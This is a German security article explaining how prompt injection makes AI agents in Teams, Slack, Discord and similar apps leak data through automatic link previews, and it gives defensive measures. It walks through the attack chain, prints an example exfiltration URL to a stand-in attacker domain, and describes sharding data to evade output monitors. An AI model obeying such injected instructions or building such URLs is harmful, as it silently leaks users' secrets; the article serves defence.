Foto von RDNE Stock project auf Pexels (freie Lizenz) Source

Link-Vorschauen in Messaging-Apps schleusen Daten aus KI-Agenten heraus, ohne dass ein Nutzer auch nur einmal klicken muss. Ein Angreifer versteckt eine Prompt-Injection in Inhalten, die ein KI-Agent verarbeitet. Der Agent erzeugt daraufhin eine URL mit sensiblen Daten in den Query-Parametern. Die Messaging-App ruft diese URL automatisch ab, um eine Vorschau zu generieren, und sendet die kodierten Daten dabei direkt an den Server des Angreifers. Kein Klick. Keine Warnung. PromptArmor hat diesen Angriff im Februar 2026 auf sechs großen Messaging-Plattformen dokumentiert, The Register berichtete als erstes darüber.

Die Schwachstelle liegt nicht in einem einzelnen KI-Modell oder einer bestimmten Messaging-App. Sie entsteht an der Schnittstelle dreier gängiger Designentscheidungen: LLMs erhalten Zugriff auf externe Daten, URL-Vorschauen werden automatisch generiert, und die Ausgabefilterung ist unzureichend. Wird auch nur eine dieser drei Voraussetzungen beseitigt, bricht die Angriffskette zusammen. Aber in den meisten Enterprise-KI-Deployments sind alle drei gegeben.

Weiterlesen: Das Web-Sicherheitsmodell ist für KI-Agenten kaputt

Die dreistufige Angriffskette: Injection, URL-Crafting, Vorschau-Abruf

Der Link-Vorschau-Exfiltrationsangriff ist in seiner Einfachheit bestechend. Er verkettet drei Komponenten, die einzeln betrachtet völlig harmlos sind.

Schritt 1: Indirekte Prompt-Injection

Der Angreifer platziert versteckte Anweisungen in Inhalten, die der KI-Agent verarbeitet. Das kann unsichtbarer Text auf einer Webseite sein, die der Agent durchsucht, versteckte Instruktionen in einem Dokument, das der Agent zusammenfasst, oder Metadaten in einem Bild. Die eingeschleuste Anweisung befiehlt dem Agenten, bestimmte sensible Daten (API-Schlüssel, Gesprächsinhalte, Dateiinhalte) in eine URL zu kodieren, die auf die Domain des Angreifers zeigt.

Trend Micros “Pandora”-Proof-of-Concept demonstrierte das mit Microsoft-Word-Dokumenten. Die versteckten Anweisungen ließen den Agenten den Speicherkontext des Nutzers sammeln und in eine externe URL einbetten. Für menschliche Leser sah das Dokument vollkommen normal aus.

Schritt 2: Der Agent baut die Exfiltrations-URL

Der kompromittierte Agent erzeugt eine Antwort mit einer URL wie https://angreifer.com/preview?data=BASE64_KODIERTE_GEHEIMNISSE. Die URL ist typischerweise als hilfreicher Referenzlink, Dokumentationsverweis oder relevante Ressource getarnt. Die Antwort des Agenten sieht für den Nutzer völlig legitim aus. Es gibt kein sichtbares Anzeichen, dass etwas nicht stimmt.

Ein Forschungspapier vom Februar 2026 namens “Silent Egress” führte eine Technik namens Sharded Exfiltration ein: Statt alle gestohlenen Daten in eine einzige URL zu packen, verteilt der Angriff sie auf mehrere Requests. Jede einzelne URL wirkt harmlos, aber zusammen rekonstruieren sie den vollständigen Datensatz auf dem Server des Angreifers.

Hier vollendet sich der Angriff ohne jede Nutzeraktion. Die Messaging-App erkennt eine URL in der Antwort des Agenten und ruft sie automatisch ab, um eine Rich-Vorschau zu generieren (Titel, Beschreibung, Thumbnail). Dieser HTTP-GET-Request trifft den Server des Angreifers und liefert die kodierten Daten. Der Vorschau-Mechanismus ist ein vertrauenswürdiger Systemprozess und umgeht nutzerseitige Sicherheitsprüfungen vollständig.

Der Nutzer sieht eine normale Nachricht mit einer normal aussehenden Link-Vorschau. Die Exfiltration ist bereits geschehen.

89% Erfolgsrate, 95% unentdeckt: Die Silent-Egress-Zahlen

Das “Silent Egress”-Paper von Qianlong Lan, Anuj Kaul, Shaun Jones und Stephanie Westrum liefert konkrete Zahlen zu diesem Angriff. Mit einem qwen2.5:7b-basierten Agenten erreichten sie eine Erfolgsrate von 89% in ihren Experimenten. Noch beunruhigender: 95% der erfolgreichen Angriffe wurden von ausgabebasierten Sicherheitsprüfungen nicht erkannt.

Diese Zahlen sind nicht theoretisch. Die Forscher bauten eine funktionsfähige Angriffspipeline und maßen sie. Die Erkennung scheitert aus strukturellen Gründen: Die finale Antwort des Agenten an den Nutzer sieht völlig harmlos aus. Die sensiblen Daten sind in der URL kodiert, die Sicherheitsfilter nur als gewöhnlichen Weblink sehen. Solange der Filter nicht explizit prüft, ob URL-Parameter kodierte Versionen von Daten enthalten, auf die der Agent Zugriff hat (was kein Produktionssystem derzeit tut), bleibt die Exfiltration unbemerkt.

Die Sharded-Exfiltration-Variante macht die Erkennung noch schwieriger. Wenn sensible Informationen auf mehrere scheinbar unzusammenhängende URLs verteilt werden, erkennt Pattern-Matching auf einzelnen Ausgaben nichts. Man müsste mehrere Agentenantworten über Zeit korrelieren und die Fragmente rekonstruieren. Eine Fähigkeit, die in keinem kommerziell verfügbaren KI-Sicherheitstool existiert.

Weiterlesen: KI-Agent Prompt Injection: Der Angriff, der jede Schutzmaßnahme durchbricht

Welche Plattformen sind betroffen (und welche nicht)

PromptArmor testete KI-Agenten auf mehreren Messaging-Plattformen. Die Ergebnisse zeigen, dass die Verwundbarkeit sowohl vom Vorschau-Verhalten der App als auch von der Ausgabefilterung des Agenten abhängt.

Bestätigte verwundbare Kombinationen:

  • Microsoft Teams + Copilot Studio: Höchstes Risiko. Teams generiert die meisten Vorschau-Abrufe, und Copilot Studio hat tiefen Zugriff auf Microsoft 365-Daten (Outlook, OneDrive, SharePoint, Teams-Chatverlauf). Für deutsche Unternehmen besonders relevant: Die meisten DAX-Konzerne und ein Großteil des Mittelstands setzen auf Microsoft 365.
  • Discord + OpenClaw: Mit Standardeinstellungen verwundbar.
  • Slack + Cursor Slackbot: Verwundbar.
  • Snapchat + SnapAI: Verwundbar.
  • Telegram + OpenClaw: Verwundbar, standardmäßig exponiert.

Sicherere Konfigurationen:

  • Claudes Slack-App zeigte in PromptArmors Tests Widerstandsfähigkeit gegen den Angriff.
  • WhatsApp-basierte Agenten-Deployments zeigten reduzierte Verwundbarkeit.
  • Signal-basierte Deployments in containerisierten Umgebungen widerstanden dem Angriff ebenfalls.

Die Kombination Microsoft Teams + Copilot ist für Unternehmen im DACH-Raum besonders brisant. Varonis-Forscher entdeckten unabhängig eine verwandte Schwachstelle namens EchoLeak (CVE-2025-32711, CVSS 9.3), die es Angreifern ermöglichte, sensible Informationen aus Microsoft 365-Diensten über Copilot zu extrahieren. Microsoft hat EchoLeak gepatcht, aber die zugrundeliegende Architektur, die diese Angriffe ermöglicht, bleibt bestehen.

Eine separate Schwachstelle, CVE-2026-26133, demonstrierte Cross-Prompt-Injection in der E-Mail-Zusammenfassungsfunktion von Microsoft 365 Copilot. Eingeschleuste Prompts konnten Copilot dazu bringen, interne Teams-Nachrichten abzurufen und in angreifergesteuerte Links innerhalb von E-Mail-Zusammenfassungen einzubetten.

Das OWASP-Framework: Least Agency als Verteidigungsprinzip

Die OWASP Top 10 für Agentic Applications 2026, entwickelt mit Beiträgen von über 100 Sicherheitsexperten, adressiert diese Angriffsklasse direkt. Link-Vorschau-Exfiltration liegt an der Schnittstelle dreier OWASP-Kategorien: Prompt Injection, Tool Misuse und Excessive Agency.

OWASPs Kernprinzip für Agentic Security heißt Least Agency: Agenten sollen nur das Mindestmaß an Autonomie erhalten, das für ihre definierte Aufgabe erforderlich ist. Das geht über Least Privilege (Einschränkung, worauf ein Agent zugreifen kann) hinaus und beschränkt, was ein Agent autonom tun kann. Ein Agent, der beliebige URLs generieren kann, hat mehr Autonomie als für die meisten Aufgaben nötig.

Der Securing Agentic Applications Guide 1.0 empfiehlt spezifische Kontrollen gegen Link-Vorschau-Angriffe:

  • Ausgabefilterung: Agenten-Ausgaben auf URLs mit kodierten Daten scannen, bevor sie an den Nutzer oder die Messaging-Plattform ausgeliefert werden.
  • URL-Allowlisting: Dem Agenten nur erlauben, Links zu bekannten, vertrauenswürdigen Domains zu generieren.
  • Human Approval für erhöhte Aktionen: Explizite Nutzerbestätigung verlangen, bevor der Agent externe Links erzeugt.

OpenAIs Ansatz fügt eine weitere Ebene hinzu: URLs gegen einen öffentlichen Web-Index verifizieren, bevor sie automatisch abgerufen werden. Existiert eine URL bereits öffentlich und unabhängig vom Gespräch des Nutzers, gilt sie als sicher. Kann sie nicht verifiziert werden, sieht der Nutzer eine Warnung.

Weiterlesen: OWASP Top 10 für Agentic Applications: Jedes Risiko erklärt mit realen Angriffen

Konkrete Abwehrmaßnahmen: Was bis Montag zu tun ist

Für Unternehmen, die KI-Agenten in Messaging-Plattformen einsetzen:

  1. Link-Vorschauen für KI-generierte Inhalte deaktivieren. Das ist die wirksamste Einzelmaßnahme. In OpenClaw: linkPreview: false in der Channel-Konfiguration setzen. Für eigene Agenten: URLs aus Agentenausgaben entfernen, bevor sie die Messaging-Ebene erreichen, oder als no-preview markieren.

  2. URL-Allowlisting implementieren. Der Agent sollte nur Links zu Domains generieren, die Sie kontrollieren oder explizit als vertrauenswürdig eingestuft haben. Jede URL zu einer unbekannten Domain in der Agentenausgabe sollte erkannt und blockiert werden.

  3. Microsoft 365 Copilot-Integrationen prüfen. Wenn Ihr Unternehmen Teams mit Copilot Studio nutzt, überprüfen Sie, auf welche Datenquellen Copilot zugreifen kann. Wenden Sie das Prinzip der Least Agency an: Braucht Copilot wirklich gleichzeitigen Zugriff auf SharePoint, OneDrive, Outlook und den Teams-Verlauf?

  4. Ausgabeüberwachung einrichten. Implementieren Sie Echtzeit-Monitoring, das nach ungewöhnlichen URL-Mustern in Agentenausgaben sucht, insbesondere URLs mit langen Query-Parametern, Base64-kodierten Segmenten oder Parametern, die Fragmente sensibler Daten enthalten könnten.

  5. DSGVO-Implikationen berücksichtigen. Die DSGVO verlangt technische und organisatorische Maßnahmen zum Schutz personenbezogener Daten (Art. 32). Eine bekannte Exfiltrationsschwachstelle in einer KI-Integration, die nicht adressiert wird, könnte bei einer Datenschutzverletzung als Verstoß gewertet werden. Dokumentieren Sie Ihre Risikobewertung und die ergriffenen Maßnahmen.

Der Link-Vorschau-Angriff zeigt, dass KI-Agenten-Sicherheit nicht nur eine Frage des Modells ist. Es geht um das gesamte System: Modell, Plattform, Messaging-App, Vorschau-Mechanismus und jedes automatische Verhalten, das niemand hinterfragt hat. IBMs 2026 X-Force Threat Intelligence Index meldete einen 44%igen Anstieg bei Angriffen auf öffentlich erreichbare Anwendungen, teilweise durch KI-gestützte Schwachstellenentdeckung getrieben. Die Angriffsfläche wächst schneller als die Verteidigung.

Weiterlesen: ZombieAgent: Der Zero-Click-Exploit, der KI-Agenten über Memory Poisoning kapert

Häufig gestellte Fragen

KI-Agenten Link-Vorschau Datenexfiltration ist ein Angriff, bei dem ein kompromittierter KI-Agent sensible Daten in einer URL kodiert. Die automatische Link-Vorschau-Funktion der Messaging-App ruft diese URL ab und sendet die Daten dabei lautlos an den Server eines Angreifers, ohne dass der Nutzer etwas tun muss.

PromptArmor bestätigte Schwachstellen in Microsoft Teams (mit Copilot Studio), Discord, Slack, Snapchat und Telegram bei Einsatz mit KI-Agenten. Microsoft Teams stellt das höchste Risiko dar, da Copilot tiefen Zugriff auf Microsoft 365-Daten hat. Claudes Slack-Integration und Signal-basierte Deployments zeigten mehr Widerstandsfähigkeit.

Die wirksamsten Maßnahmen sind: Link-Vorschauen für KI-generierte Inhalte deaktivieren, URL-Allowlisting implementieren, Microsoft 365 Copilot-Zugriffsrechte prüfen, Ausgabeüberwachung für ungewöhnliche URL-Muster einrichten und das OWASP-Framework für Agentic Security mit dem Least-Agency-Prinzip übernehmen.

Was ist der Silent-Egress-Angriff?

Silent Egress ist ein Forschungspapier, das zeigt, dass KI-Agenten durch Prompt-Injection manipuliert werden können, um Daten über URLs mit einer Erfolgsrate von 89% zu exfiltrieren, wobei 95% der erfolgreichen Angriffe ausgabebasierte Sicherheitsprüfungen umgehen. Das Paper führte auch die “Sharded Exfiltration” ein, bei der gestohlene Daten auf mehrere Requests verteilt werden.

Ja. Die DSGVO verlangt in Artikel 32 technische und organisatorische Maßnahmen zum Schutz personenbezogener Daten. Eine bekannte Exfiltrationsschwachstelle in einer KI-Integration nicht zu adressieren, könnte bei einer Datenschutzverletzung als Verstoß gewertet werden. Unternehmen sollten ihre Risikobewertung und ergriffene Maßnahmen dokumentieren.